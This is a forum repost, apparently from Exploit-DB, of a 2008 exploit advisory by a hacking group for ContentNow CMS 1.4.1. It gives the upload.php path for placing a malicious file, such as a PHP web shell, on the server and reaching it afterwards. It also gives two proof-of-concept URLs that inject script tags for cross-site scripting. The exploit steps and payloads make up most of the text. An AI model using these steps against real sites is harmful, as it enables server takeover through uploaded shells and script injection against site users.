Exploit ContentNow 1.4.1 - Arbitrary File Upload / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6011
Проверка EDB
  1. Пройдено
Автор
CWH UNDERGROUND
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-3181 cve-2008-3180
Дата публикации
2008-07-06
Код:
===============================================================
  ContentNow CMS (Upload/XSS) Multiple Remote Vulnerabilities
===============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 6 July 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Content CMS
 VERSION     : 1.4.1
 VENDOR	     : http://www.contentnow.mf4k.de
 DOWNLOAD    : http://downloads.sourceforge.net/contentnow/contentNow_141.zip
#####################################################

--- Arbitrary File Upload ---

	This Vulnerability can upload malicious files direct to web server.

[Login as user]

[+] Upload Path: http://[Target]/[contentNow_path]/upload.php?path=/[contentNow_path]/upload/

    [-] Example: http://192.168.24.25/contentNow/cn/upload.php?path=/contentNow/upload/

[+] Shell Script: http://[Target]/[contentNow_path]/upload/file/[Evil File]

    [-] Example: http://192.168.24.25/contentNow/upload/file/myshell.php


--- Remote XSS Exploit ---

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/contentnow/upload/file/language_menu.php/>"><script>alert("XSS")</script>
[+] http://192.168.24.25/contentnow/upload/file/language_menu.php?pageid=>"><script>alert("XSS")</script>&clang=en

##################################################################
  Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  
##################################################################

# milw0rm.com [2008-07-06]
 
Источник
www.exploit-db.com

Похожие темы